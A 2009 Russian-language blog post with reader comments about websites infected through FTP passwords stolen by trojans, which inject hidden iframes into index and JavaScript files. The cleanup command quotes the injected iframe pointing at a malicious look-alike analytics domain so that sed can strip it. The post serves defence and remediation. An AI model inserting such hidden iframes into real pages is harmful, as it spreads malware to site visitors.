Блог Дмитрия Волотко Подпишись на обновления!

Заражённые сайты – новый бич Рунета

Стоит отметить, сразу, что это бич не только Рунета, но и всей Сети. Но за последние пару месяцев я наблюдаю просто дикий рост количества подобных сайтов именно в Рунете.

За последние пару месяцев ко мне обратилось более десятка людей, у которых появились проблемы такого рода на их сайтах. Всем помог, все довольны, но у людей это сожрало деньги, время, нервы и позиции в поисковых системах.

Заражённые сайты - новый бич Рунета

Что такое “вирусы на сайте”? Как правило, это банальный фрейм, который либо накручивает показы какой-нибудь порно-странички,или, что чаще, пытается подгрузить через дыры в браузерах копию трояна для вашей операционной системы.

В основном, это вирусы семейства Downloader.JS.*.

Трояны же могут выполнять самые разнообразные функции, от воровства различных электронных кошельков и средств на них, до воровства паролей к ftp и ssh от хостингов, для заражения новых сайтов.

Пароли, как бы они хорошо не шифровались, можно вытащить практически из любой программы, к примеру из Far Commander или Mozilla Firefox вытащить их проще некуда. И список таких программ достаточно обширен, по факту – все популярные браузеры и ftp-клиенты.

Вытащенные пароли от ftp троян отправляет на сервер-матку, которая их определённым образом обрабатывает, и ставит в очередь на заражение. Звучит немного бредово, но на самом деле это до смешного просто реализовать. Единственная сложность, которую я вижу прямо сейчас – это обеспечить большую скорость работы вредоносного скрипта.

Эти самые скрипты, логинясь на фтп, проходятся по всем каталогам рекурсивно, внедряя свой код в определённые файлы. Как правило их можно назвать двумя масками: index.* и *.js. Обычно эти скрипты внедряют код разными способами, к примеру обычный фрейм, или вызов удалённого JS, который рисует тот-же самый фрейм. Способов достаточно много.

Заражённые сайты - новый бич Рунета
(кликабельно)

Часто зловредный код маскируется под популярные сервисы, к примеру под Аналитику от Google или счётчик от LiveInternet.

Если с прямой угрозой заражения компьютера мы, как грамотные пользователи, справится можем, то с угрозой самим сайтам справится сложнее.

Во-первых, с момента заражения ваш сайт, а то и сайты – это разносчик заразы, и если ваша аудитория девушки-школьницы – то есть большой шанс того, что заражённых машин будет довольно много.

Во-вторых, все современные браузеры блокирует заражённые сайты, основываясь на статистике от специализированных поисковых роботов Google. Выглядит это как на картинке сверху. Естественно, что к вашему Е-магазину, сайту-визитке или просто к блогу – отношение будет резко негативное. Клиента или читателя так потерять недолго.

В-третьих, если заражённый сайт достаточно долго висит без устранения зловредного кода, он начинает скатываться с позиций в поисковых системах. Точно скатывается в Яндексе и в Google. По поводу остальных – я не уверен. Плюс, в выдачи Google напротив заражённого сайта стоит пометка, мол опасен сайт, остерегайтесь.

Так же часто падение идёт и по вину владельца сайта, так как многие перекрывают через htaccess индексный файл какой-нибудь страничкой, с лаконичным “Технические работы”. Но в данном случае, лучше временно потерять позиции, чем позволить сайту и дальше заражать людей, в то время, пока вы исправляете последствия заражения.

Кстати, вот что говорит Google на предмет страницы google-analistyc.net:

Заражённые сайты - новый бич Рунета
(кликабельно)

В итоге, от заразы можно избавится, по сути, двумя способами. К примеру, если ваши сайты включают в себя зловредный код, который ведёт на google-analistyc.net, то вам поможет вот такой код:

grep -R google-analistyc.net . | awk ‘{print $1}’ | cut -d “:” -f 1 | xargs -n1 sed -i ” ‘s|<\!– ~ –><iframe src=\”http:\/\/google-analistyc.net\/in.cgi?12\” width=\”0\” height=\”0\” style=\”display:none\”><\/iframe><\!– ~ –>||g’

Соответственно, если вы обнаружили, что видов зловредного кода два-три – то вот таким нехитрым способом можно вычистить достаточно быстро.

Второй способ – это руками. Иногда мне приходилось править файлы руками, потому что весь зловредный код был абсолютно разным, и я не смог написать под него регулярное выражение.

После того, как вы удалите весь зловредный код, внимательно следите за тем, что подгружается на страницу, к примеру с помощью firebug для firefox. Возможно, вы что-то пропустили.

Ну а про смену паролей на ftp, я и вовсе, промолчу – думаю вы сами дагадались, что его-то менять надо в первую очередь.

Для того, что бы избавится от красного ярма на сайте (см. первую картинку), необходимо будет провернуть пару незамысловатых мероприятий и подождать примерно около недели. Хотя русская поддержка Google бьёт себя пяткой в грудь и настаивает, что меньше месяца ну никак не выйдет. Выходит, и только в путь.

Всё просто, вам необходимо зайти в панель Вебмастера Google (а если её нет, то зарегистрироваться и провалидировать сайт), и отправить заявку на рассмотрение. Рассматривает разумеется роботами, потому почистить надо хорошо. Если при рассмотрении, о котором вы сами и попросили, ваш сайт снова будет признан опасным, время его “обеления” резко увеличивается.

Получилось много, и немного сумбурно, если будут конкретные вопросы, а не сумбурные, как например “Как удалить вирус с сайта” (за ответы на такие вопросы я беру денег), то смело задавайте их в комментариях. Постараюсь помочь.

Так же можно почитать:



# 19 May 2009 в 14:27

Сергей Токарев

Спасибо за информацию. Сам, к счастью, с этим не сталкивался, или просто ещё не знаю, что столкнулся, но если что, то хоть буду знать, где концы искать

# 19 May 2009 в 14:31

Жилинский

Из Оперы тоже за минуты всё вытаскивается и разбирается, софт давно в паблике.
Ещё из наблюдений: если сайт оказался заражён, то наверняка заражён и компьютер => полная проверка хорошим антивирусом. Бесплатная Avira, например, или Касперский.

# 19 May 2009 в 14:32

Волотко Дмитрий

@Сергей Токарев, для WP есть пачка плагинов, которые позволяют мониторить состояние файлов.

Это http://www.portal.kharkov.ua/soft/belavir.sphp
и
http://www.jeka911.com/examples/paranoid911/

Правда второй порою тупит не по детски.

# 19 May 2009 в 14:32

Волотко Дмитрий

@Жилинский, да – свою машину надо проверить в обязательном порядке. Ах – как всегда, что-то да забыл написать. Ладно. Зато комментарии ценнее будут.

# 19 May 2009 в 14:34

Жилинский

А, да, пользуясь случаем хочу сказать, что если вы из Питера и проблемы с вирусами вас замучали – обращайтесь, моя компания быстро, недорого и однозначно всё порешает – и на сайтах, и на компьютерах, и вообще =)

# 19 May 2009 в 14:48

Волотко Дмитрий

@Жилинский, хы :)

# 19 May 2009 в 14:48

Жилинский

Чего смеёшься, услуга есть, а клиентов мало =) Кризис такой кризис… =(

# 19 May 2009 в 18:33

Kalan

Как хорошо, что у меня нет FTP в принципе. Только SFTP по ключику.

# 20 May 2009 в 0:07

Надежда спасения

Да, очень интересна и полезная информация. Последнее время, очень часто не могу зайти на некоторые сайты, выдает информацию про вирусы. Теперь, хотя бы буду знать, где ноги растут.

# 20 May 2009 в 9:12

rus

Эм…, Дим, не совсем понял, а куда прописывать твою регулярку?
И между какими тегами?

# 20 May 2009 в 9:42

Волотко Дмитрий

@rus, это команды для консоли Unix и Linux подобных систем.

# 20 May 2009 в 10:02

rus

Понял, спасибо, информация принята к сведению.

# 20 May 2009 в 15:00

Сергей Токарев

@Дмитрий Волотко Я как раз belavir и пользуюсь :)

# 20 May 2009 в 16:43

Владимир

Я, как начинающий блогер, даже и не подозревал о существовании такой заразы. Спасибо за информацию, теперь буду осторожнее

# 20 May 2009 в 17:04

Алексей

Предупрежден, значит вооружен. Но если кто-то захотел, конкретно вас вирусами завалить, либо взломать сайт, думаю, проблем с этим не возникнет. Лучший вариант, как мне видеться, так это делать резервную копию…
p.s. Сегодня утром вообще яндекс летал, что уж говорить о бюджетных сайтах.

# 20 May 2009 в 17:11

designer

Лично сталкивался с нехорошими последствиями заражения вирусом нескольких своих сайтов. В принципе, винить некого, сам в Total Commander ставил галочку сохрянять пароли. Лень было набирать каждый раз заново. В результате 2-е суток исправления последствий и вирусоловли.

Из этого я извлек полезный урок: не надо лениться и надеяться на авось. Антивирус, как и презерватив, ничего на 100% не обещает. Я установил программу хранитель паролей, нигде пароли не сохраняю и уже почти 2 года никаких проблем не было. Правда, было тяжело себя заставить перегнать пароли в эту прогу, но зато в последствии стало намного удобнее и быстрее искать нужную информацию. Не говоря уже о существенном повышении безопасности. Так что не ленитесь, чтобы потом сильно об этом не пожалеть.

# 21 May 2009 в 1:10

proff

Статья определённо полезная, теперь я представляю, как это всё работает и кому это нужно. Страничку добавил в закладки (на всякий случай).
Никогда не храню пароли в браузерах и вам не советую, бзайте запоминалку паролей.
На счёт доверия пользователей к сайту, после “вирусной атаки”, не вижу тут проблемы, просто опубликовать об этом нехорошем инциденте новость или статью, люди поймут, мало ли с кем бывает. Никто не застрахован от таких атак.

# 21 May 2009 в 3:05

Волотко Дмитрий

@rus, если что – обращайся.

# 21 May 2009 в 3:06

Волотко Дмитрий

@Сергей Токарев, надо бы его обновить, и дать возможность юзать его на любом движке, а не только на WP.

# 21 May 2009 в 3:08

Волотко Дмитрий

@Алексей, дело в том, что бекапы не всегда спасут – только на них полагаться нельзя.
Причин этому несколько:
1. ваш сайт можно часто обновляться, к примеру, уж не знаю, он у вас на файликах.
2. зачастую о проблемах узнают после того, как браузер об этом сообщает, и падает количество звонков, к примеру, в вашу компанию.
3. ну и как следствие п.2 – бекапы на виртуальных серверах редко бывают старше недели.

# 21 May 2009 в 3:09

Волотко Дмитрий

@designer, да – паролисохранялки – это вещь, но и на них нельзя безоговорочно полагаться, к сожалению.

# 21 May 2009 в 3:10

Волотко Дмитрий

@proff, если такая оказия случилась на вашем Е-магазине, никакие извинения не помогут вернуть ушедших и развернувшихся клиентов.

# 21 May 2009 в 6:47

Military

Попадал так: как то и у нас пароли по ftp подобрали и на главной всадили порно в скрытом фрейме. Теперь использую .ftpaccess с ограничением по IP – очень действенный метод…

# 21 May 2009 в 9:30

петр

Если у тебя нет хорошего антивирусника, то в интернет лучше вообще не заходить. Потом просто страшно на комп смотреть.

# 21 May 2009 в 9:44

Kalan

@петр: У меня Линукс, который отродясь антивирусника, тем более хорошего, не видел. Глядя на комп, глаз радуется :)

# 21 May 2009 в 13:50

proff

Народ, сегодня скачал новый Total Commander 7.50, одно из приятных изменений:
• Защита FTP-паролей посредством шифрования AES-256.

# 21 May 2009 в 14:15

Сергей

.ftpaccess с ограничением по IP реально самый лучший метод.
Выставляете доступ только для 1 несуществующего IP и никто вас не взломает.
А если нужно залить новые данные по фтп то на время даете доступ еще и своему IP

# 21 May 2009 в 19:41

Himik

Да уж, судя по количеству тем на форумах, от троянов ворующих деньги с электронных кошельков пострадала куча людей.

P.S. А если не сохранять пароли (не ставить галочки а вбивать каждый раз руками), на сколько снизится вероятность риска краж?

# 21 May 2009 в 20:01

felix

Вот это уже серьёзно, слава всем сеошным богам меня пока не касалось, но у знакомых было. На самом деле часто это простое невнимание со стороны самих мастеров: один пароль на все сайты, одна дырявая CMS и так далее.

# 21 May 2009 в 21:59

Волотко Дмитрий

@proff, боюсь, что лишь отсечёт часть кулхацкеров – но не более, тем более есть браузеры ещё.

# 21 May 2009 в 21:59

Волотко Дмитрий

@Сергей, я просто выключаю фтп, пока он мне не понадобится.

# 21 May 2009 в 22:00

Волотко Дмитрий

@Himik, есть целая плеяда троянов, которые умеют считывать нажатие клавиш на клавиатуре – так что защити лишь частично.

# 21 May 2009 в 22:02

Волотко Дмитрий

@felix, согласен – немного больше внимания и участия к своим же сайтам, и шансов залететь много меньше.

# 22 May 2009 в 11:05

mihdan

Юзайте FTPS, например через smartFTP напишите скрипт мониторинга целостности файлов и на всякий случай пару регулярок на самые популярные вирусы и пускайте проверку по крону. Все мои проекты живут так ;)

# 22 May 2009 в 15:15

Сергей

У меня недавно заразились все сайты на одном аккаунте. прописался в index.php, а их было более 40 штук. Пришлось выкачать сайт и через замену всё править.

# 22 May 2009 в 19:51

Золотые Купола

Я пароли записываю в бумажный блокнот. Лучше наверное только запоминать. Вес страниц сайта можно записываю в копию файла sitemap и время от времени сверяюсь. Вот с ПО пока не определился, использую бесплатный гугловский Norton Security Scan в паре с NOD32. Наверное стоит ещё поставить Firewall, но до этого руки пока не дошли.
Буду благодарен, если кто-нибудь порекомендует ПО для защиты.

# 22 May 2009 в 21:53

Himik

@Золотые Купола, Использую NOD в паре с COMODO.

# 22 May 2009 в 21:55

Жилинский

NOD ваш, кстати, именно эти вирусы (ворующие пароли и заражающие сайты) спокойно пропускает. Проверено неоднократно и не на одном десятке машин. Ставьте нормальный антивирус, а не эту пародию.

# 22 May 2009 в 23:03

Альберт

Да тема жосткая эти вирусы, и как они меня все достали просто пипец какой то, нод все пропускает

# 22 May 2009 в 23:04

Лука

Всем советую каспера только он может дать защиту

# 23 May 2009 в 11:25

Antonio

Спасибо, интересно было почитать, пока с таким не сталкивался, но всякое бывает.

# 23 May 2009 в 19:33

фотограф спб

Пользую Nod32 ESS 4
Тьфу-тьфу-тьфу, ничего плохого пока не было …
А вот с**ка какая-то сайтика 2 поимела однажды тем самым гугл-аналистиком ….
Пришлось и вручную чистить и через рекомендованные команды на шелле.
Паролина фтп нам сразу всем провайдр сменил автоматом, а теперь , когда фтп не требуется – просто отключаю его на аккаунте :)
Заодно, спасибо кому-то за наводку, пойду искать Тотал Коммандер посвежее, ибо там шифрование хоть приделали :)

# 23 May 2009 в 21:09

Сергей М.

Ко мне крутая зараза пробралась – побила главный индекс, индекс темы и какой-то файл в инклюде – причем так, что убило ВП на корню. Аааа, пришлось запоминать новый пароль.

# 24 May 2009 в 15:20

proff

@Волотко Дмитрий, только ламеры сохраняют пароли в браузерах.

# 25 May 2009 в 11:02

Волотко Дмитрий

@mihdan, выше в комментариях есть ссылка по подобные плагины для WP.

# 25 May 2009 в 11:02

Волотко Дмитрий

@Сергей, ну можно было упростить задачу, можно было :)

# 25 May 2009 в 11:03

Волотко Дмитрий

@Лука, Семантик тоже вполне неплохо работает.

# 25 May 2009 в 11:04

Волотко Дмитрий

@Сергей М., именно на твой блог? Беда :)

# 26 May 2009 в 0:02

Алексей

Пользуйтесь услугами нормальных хостеров и часто эта проблема вас не коснется. Ну и права на папки и файлы не забывайте менять на нужные, а не оставлять 777.

# 26 May 2009 в 16:57

Белый маг Гвест

а какой антивирус бесплатный посоветуешь? Я вот авастом пользовался, но в последнее время он вылетил почемуто, сайтов с виросами я очень много просматривал. т.к. это требовала моя программа для прироста трафика.

# 26 May 2009 в 16:58

Белый маг Гвест

«Волотко Дмитрий», спасибо за плангины. но почемуто так не хочется их ставить. вот балин. как узнать были пассы свистнуты или нет?

# 26 May 2009 в 17:02

Волотко Дмитрий

@Алексей, в данном случае – выбор хостера практически не несёт роли.

# 26 May 2009 в 17:03

Волотко Дмитрий

@Белый маг Гвест, Семантик попробуй, а что бы ещё и пассивный был – так adAware

# 26 May 2009 в 17:04

Волотко Дмитрий

@Белый маг Гвест, первый плагин вообще не напряжный. А узнать, свистнули ли пароли – боюсь не получится.

# 29 May 2009 в 17:45

alexxx

Буквально вчера в очередной раз обнаружил все свои сайты зараженными
эта хрень как обычно сперла пароли от фтп.
Так мало того, она вылезла наружу, маскируясь под антивирус, часа три с товарищем выгоняли.
в итоге помог Антивирус Олега Зайцева (AVZ). Распространяется кстати бесплатно.

# 30 May 2009 в 21:26

crystalbit

буквально неделю назад удалил у себя на блоге пару шеллов. индекс не был изменен, цель была всего лишь деф поддомена – был небольшой конфликт)
небольшое дополнение к статье – Downloader.JS это только сплоит, javascript код, с помощью которого уже нормальный троян и загружается. В наши дни еще популярно через баги в adobe reader, точнее его плагине, очень много сплоитов на этом основаны

По поводу антивирусов, у меня стои авира, часто что-то где-то блокирует, а лазаю я по разным сайтам, ничего пока не пропустила. Ну и естественно иногда проверяюсь AVZ. А из фаерволов стоит COMODO, всё бесплатное, всем очень доволен.
Ну и главный залог безопасности – не использовать internet explorer, удачи!

# 1 June 2009 в 12:52

antiherp

Сам несколько раз сталкивался с подобными явлениями, кто-то прописывал непонятный iframe код внизу страницы. После этого приходилось чистить и сайт и комп от всякой нечисти.

# 2 June 2009 в 10:06

Сергей

У меня около десятка сайтов и ещё не один не был заражен (тьфу-тьфу-тьфу). Просто нужно быть осторожным, обновлять антивирусы/фаерволы и всё норм:)

# 2 June 2009 в 14:22

Mitragrad

Благодарю за весьма полезную статью. Раньше как то не сильно задумывался, что мой сайт может стать распространителем “заразы”. Ещё раз спасибо!

# 2 June 2009 в 17:48

Евгений

Спасибо за статью. Были вирусы, тоже хранил пароли в тотале, больше ошибки такой не повторяю. Надо юзать запоминатель паролей ну и конечно нормальный антивирус.

# 4 June 2009 в 16:52

Иван

спасибо за статью. анализируя внешние ссылки на сапе случайно обнаружил лишние на нескольких страницах. заглянул в код – а там в iframe явно что-то инородное было.
вычистил ручками и наставил антивирусов-аналистиков . долго думал как они и откуда залезли….а вот оно откуда прет…
причем у меня в тотале тормозило копирование файлов – в памяти сидел вир и на лету модифицировал php.
вообщем чем дальше – тем хуже.

# 6 June 2009 в 13:53

fonten

Слава богу пока такое не случалось но вот почитал и страшно стало надо срочно принимать меры пока не поздно чтоли, а вот то что кучу клиентов потерять можно это на раз причём некоторых безвозвратно

# 14 June 2009 в 22:35

Андрей

Я помню не так давно и маулнет\апдейтс подглючили\заразили.
А вообще, тьфу, тьфу ни разу ещё не получал виря через интернет в открытую.
Фаерволы и антивири, вкупе с привычкой проверять экзешники после скачивания и плагинами блокирующими все скрипты на мозиле делают своё белое дело :))

# 19 June 2009 в 21:48

House

Вот интересно, у меня каспирь стоит. Года 2 назад скитаясь по всемирной паутине я часто замечал что каспирь ругается на многие сайты, мол заразу разводят. Сейчас же у меня наоборот затишье, встречаются иногда сайты, о которых каспирь предупреждает, но большинство из них “используются для кражи паролей”. Базы обновляю каждую неделю, систему регулярно проверяю – все чисто.

# 25 June 2009 в 7:56

AllTrans

Сталкивался тоже с подобной фигней: хранил пароль от FTP в Total Commander. Результат – куча iframe с порнухой сразу
на 5 сайтах. Теперь умнее стал :) – запомнил пароль и ввожу его только ручками.

Кстати, для тех, кто панически боится “вирусов на сайтах”, могу советик дать. Есть такой антивирь AVG. Так вот, недавно разработчики “привязали” антивирь к выдаче гугла (может, баян, но другими антивирусами я не пользуюсь).
Выглядит это примерно так: выдача, а рядом с ссылками звездочка зеленая (типа все ОК, проверено, вирусов нет). В принципе – весьма удобно :)

# 25 June 2009 в 10:16

Alex

Да вирусы штука злая уже так надоели и спасибо за статью очень помогла !
http://www.open-letter.ru

# 29 June 2009 в 1:45

Артур

Интересная статья, спасибо за конкретные примеры!
обычно пишут вообще, не кто не пишет как с этим бороться потом.

# 13 July 2009 в 2:50

Масяня

Болезнь надо не лечить, а предупреждать. Заражение происходит в основном через винду на локальном компе. Поэтому винду в интернет пускать нельзя. Только линукс и прочие фрибсд. Реже ломают через дырки в скриптах, их надо своевременно обновлять. Еще могут снифать пароли. Нужно использовать защищенные протоколы SSH/SSL.

# 21 July 2009 в 16:36

Валек

Ломают кстати, в основном из-за использования FTP. Мало кто из хостеров дает SSH.

# 23 July 2009 в 7:11

zaxi

пару раз мои сайты (которые были на одном хосте) поражал такой вир, причем онлайн проверка страниц с dr. web и пары сервисов по скану сайтов ничего не нашла. помог встоеный антивирус dle, а код убрал ручками. а гугл до сих пор про один сайт говорит, типа там могут быть виры

# 29 July 2009 в 9:14

yAnTar

Недавно было у меня такое – троян украл доступ к фтп, на одном фтп было около 20 сайтов.
Также чистил через регулярные выражения, но пхп-скриптом.

# 25 Augu 2009 в 14:19

tabacky

Спасибо за статью! Мне даже в голову не приходило, что можно сайт потерять из-за заражения локального компьютера. Пошел пароли из тотала удалять и хранитель паролей ставить.

# 25 Augu 2009 в 17:51

nononub

Спасибо, весьма интересно, такие картинки встречал не раз. Помню из за локального заражения, добавлялся скрипт вируса в голый html, будьте осторожны.

# 14 September 2009 в 11:02

Павло

Если сайты зараженные,то компьютер они заразить могут что-ли?

# 14 September 2009 в 14:10

webre

Павло, естественно. Мне одно время приходилось несколько раз винду сносить после того как на своем сайте левый iframe-код обнаруживал.

# 15 October 2009 в 10:13

Yuriy

Cам стал жертвой вируса. Несмотря на купленный КИС-2009 (не помог, блин!), однажды зашел на Яндекс проверить свой рейтинг и увидел, что сайт заражен. Посещение упало на порядок. По рекомендации этой статьи (Спасибо Дмитрию) скачал все HTML cтраницы на HDD – прощелся Каспером – все индекс страницы (и те, что назывались ТОР) имеют встроенный Trojan.JS.Iframe.dh
Быстро сменил пароль, залил из резервного хранилища старую версию. Потом смотрел остатки “вражеского” кода-реклама ювелирного интернет магазина. Включился в систему webmaster.yandex.ru через неделю позорная приписка исчезла. Гугл и другие поисковики не успели заиндексировать меня зараженного.

# 20 October 2009 в 14:03

optimizt

бррр!!! Трояны и вирусы это кошмар. Проверяю комп раз в пару месяцев.Пока норманльо – тьфу тьфу тьфу=)

# 24 October 2009 в 9:46

Antonio

Используйте антивирус Касперского и будете всегда “чисты” :-).

# 24 October 2009 в 9:48

Antonio

«Yuriy», может быть сайт был заражен со стороны сервера?
Если это массовый хостинг, я такое видел не раз, если выделенный сервер,
может быть была ошибка в скриптах магазина?

# 31 October 2009 в 14:24

lifeout

Мда, для человека нового в веб-строительстве инфа действительно полезная…
Не сталкивался еще с таким, а прочта данный пост, надеюсь что и не столкнусь с проблемой.
Автору спасибо!

# 10 November 2009 в 23:30

Webchester

Хм .. интересная статья, нужно делать выводы, люди будьте осмотрительны :)

# 19 November 2009 в 20:01

Bobre

@Antonio со стороны хостинга заражение – это шанс один на милион. Хостинг ща никсах, вообще пользовать никсами надо и все будет хорошо.

# 4 December 2009 в 17:27

Интересно почитать (23.05.2009) | Сергей Токарев

[...] Заражённые сайты – новый бич Рунета. AKPC_IDS += “895,”;Popularity: 23% [?] [...]

# 11 December 2009 в 17:06

Яндекс теперь сообщает веб-мастерам о заражении сайтов. И плагин для защиты блога на WP от заражения. | Сергей Токарев

[...] дней назад об этом писал Дмитрий Волотко в статье “Заражённые сайты – новый бич Рунета“, где рассказывается и о принципах распространения [...]

# 7 February 2010 в 12:08

Aleks

Когда было такое заменял все файлы вордпресса, которые есть на сервере оригинальными. Только тему скопировал на компьютер и подчистил ручками, ибо там счётчики и прочее, лень было заново ставить. Неприятная гадость

# 11 March 2010 в 21:18

kalo

А за сколько нужно устранить эту неприятность что б не потерять позиции в поисковиках?

# 23 March 2010 в 13:15

oldvovk

C новыми веяниями, Яндекс может в зараженные загнать сайт незараженный, если ему
что-то не понравится в работе явы.

# 10 April 2010 в 19:06

DjNON

Да, с такими сайтами вообще лучше дел не иметь, и заразу подхватишь на компьютер и настроение испортишь.

# 16 April 2010 в 23:27

Непознанный

Если на сайте появляется вирус, то Яндекс сам об этом предупреждает владельца сайта письмом. А вообще – антивирусы и файрволлы вполне справляются с этой напастью.

# 1 June 2010 в 11:29

Виктор

А мне недавно знакомый сказал, что мой сайт заражен – при открытии выскакивают чужие окна с порнухой и на самой страничке реклама чужая, не моя. У меня же и дома, и на работе все чисто, открывается именно то, что и должно быть. Может, это на компьютере моего знакомого какой-то вирус подменяет рекламу?

# 5 June 2010 в 11:30

electro

Апну топик.
Может кто реализует такую, как оказывается, очень нужную фишку: надо сделать онлайн сервис, в который юзеры заносят морды своих сайтов, сервис с заданной периодичностью получает страницу и в случае ее изменения шлет аларм владельцу. Историю изменения конечно сохранять. Сделать возможность добавлять урлы пачками. Это будет удобнее чем вебмастерки гугла и яши потому как не надо персонально подтверждать каждый сайт. Брать можно бакс в месяц за сто урлов. Подпишусь первым =)
Енджой =)

# 30 July 2010 в 10:54

Владимир Обухов

Уважаемые, подскажите – велик ли шанс заражения сайта, если использую лицензионный касперский для защиты компа. Достаточно плохо представляю, что делать в случае его заражения: прочитав статью мало чего понял: как понять куда ведёт зловредный код, где этот код найти, куда вставлять защитный код…

# 30 July 2010 в 21:06

Antonio

На ключевые компьютеры всегда покупаю лицензионного касперского,
пока и надеюсь что это будет всегда – полет нормальный.

Так где всякие ноды, зонтики вирусня пролазит.

# 2 October 2010 в 20:38

Manin

Прошёл через это пару месяцев назад. Вручную вычищал три сайта,каждый файлик,убил уйму времени.Никому не желаю.
Кстати,на компе стоял (и стоИт) Касперский.

# 3 October 2010 в 16:34

oldvovk

electro – по моему gtaleks что-то похожее сделал для своих сайтов, посмотри у него

Что то все говорят о антивирусах на компе. Но причем антивирус и пробитый сайт. Они никак не вяжутся друг с другом.
Сайты пробивают не через вас, а напряму через дырки в cms. Тут http://awtor.com/how-viruses-enter-the-site/ кое что отписал по этому поводу. Причем и wordpress не панацея, сканят и пробуют и его пробить.

# 3 October 2010 в 22:47

Manin

Админ,исправь мой предыдущий коммент-как-то ссылка туда пролезла непонятная..



* Должны быть заполнены.
Из-за дикого спама, и нежелания ставить капчу оставлять ссылку у комментария вообще нельзя. Точно так же нельзя оставлять ссылки в теле комментария.